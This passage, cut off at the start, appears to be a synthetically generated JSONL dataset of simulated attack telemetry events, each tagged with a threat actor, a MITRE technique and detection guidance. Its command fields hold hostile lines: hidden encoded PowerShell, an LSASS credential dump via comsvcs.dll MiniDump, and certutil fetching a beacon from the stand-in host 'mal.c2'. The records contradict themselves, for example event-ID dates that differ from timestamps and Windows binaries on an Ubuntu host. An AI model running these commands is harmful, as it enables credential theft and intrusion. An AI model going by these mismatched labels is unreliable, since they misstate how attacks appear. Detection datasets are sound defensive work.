-enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-01-03T05:48:54.000Z","user":{"name":"CORP\\pdiqkzsr176v","sid":"S-1-5-21-873756842-369723885-9444"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20260429T020900000Z_0004791","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.74.206.61","name":"APP-WEB-PRK0XG5YTN","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4791Volt TyphoonT1098.004"},"network":{"domain":"github.com","dst_ip":"1.96.82.136","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-01T12:44:02.000Z","user":{"name":"arn:aws:iam::5i18vv28ao4j","sid":"S-1-5-21-345909331-805642629-3203"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution","Initial Access","Defense Evasion"],"technique_id":"T1531"},"event_id":"evt_apt41_20261023T220046000Z_0004793","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.54.144.52","name":"DB-ORACLE-OA9SIC30CM","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4793APT41T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.122.97.52","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3838 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-08T18:51:31.000Z","user":{"name":"svc_o0z8qjray83y","sid":"S-1-5-21-433164887-107292271-3092"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control","Credential Access","Impact"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20250709T102738000Z_0004795","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.50.177.52","name":"WIN-FIN-SRV-KFJSI3J2EX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4795Scattered SpiderT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.8.221.127","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3492 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-16T04:11:09.000Z","user":{"name":"CORP\\iora58vzlwak","sid":"S-1-5-21-550911905-344367465-7622"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration","Initial Access","Reconnaissance"],"technique_id":"T1570"},"event_id":"evt_unc4841_20260509T133959000Z_0004797","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.210.232.45","name":"DB-ORACLE-NCF5U0MFTF","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4797UNC4841T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.117.226.105","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-01-17T22:56:13.000Z","user":{"name":"i-3km5xvvp5ail","sid":"S-1-5-21-418000369-490871716-7435"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Execution"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20250207T140225000Z_0004799","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.112.49.141","name":"WIN-FIN-SRV-9MKQU9OSLS","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4799Lapsus$T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.188.55.104","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-07T23:47:41.000Z","user":{"name":"i-d88avrutezjm","sid":"S-1-5-21-987593106-986427673-7526"}}